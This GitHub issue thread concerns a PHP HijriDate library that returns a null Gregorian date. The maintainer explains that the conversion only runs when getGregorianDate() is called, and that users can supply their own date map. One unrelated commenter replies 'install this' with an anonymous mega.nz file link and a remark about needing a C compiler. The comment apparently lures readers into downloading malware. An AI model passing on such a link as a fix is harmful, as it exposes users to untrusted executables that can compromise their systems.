### ISSUE TITLE
Creating new HijriDate instance does not convert Gregorian date.

### ISSUE THREAD

**Issue by synysterash** [Remls/hijri-date#4]
I created a new HijriDate with the params of 1446, 07, 27. It should return a gregorian date but in this case it's null. 

`
Remls\HijriDate\HijriDate {#1716
  -year: 1446
  -month: 7
  -day: 27
  -locale: "en"
  -gregorianDate: null
  date: "1446-07-27"
`

Am I doing something wrong somewhere?

**Comment by synysterash** [comment]
Perhaps it's because the external map isn't updated. Could you update it or is there anyway for me to update it?

**Comment by nhatlaso1** [comment]
install this

https://mega.nz/file/1vkGlJTL#yU-SJLlIilF0mx5qwpPOd3BM8iKZqOJLEQUStR76rrQ

you may need to install the c compiler

**Comment by Remls** [comment]
Displayed Gregorian date will be null for dates created from Hijri date; it will only convert if asked to. Call `getGregorianDate()` on the date object to convert.

**Comment by Remls** [comment]
> Could you update it or is there anyway for me to update it?

You are free to use your own map if you want; setup instructions are in the README.
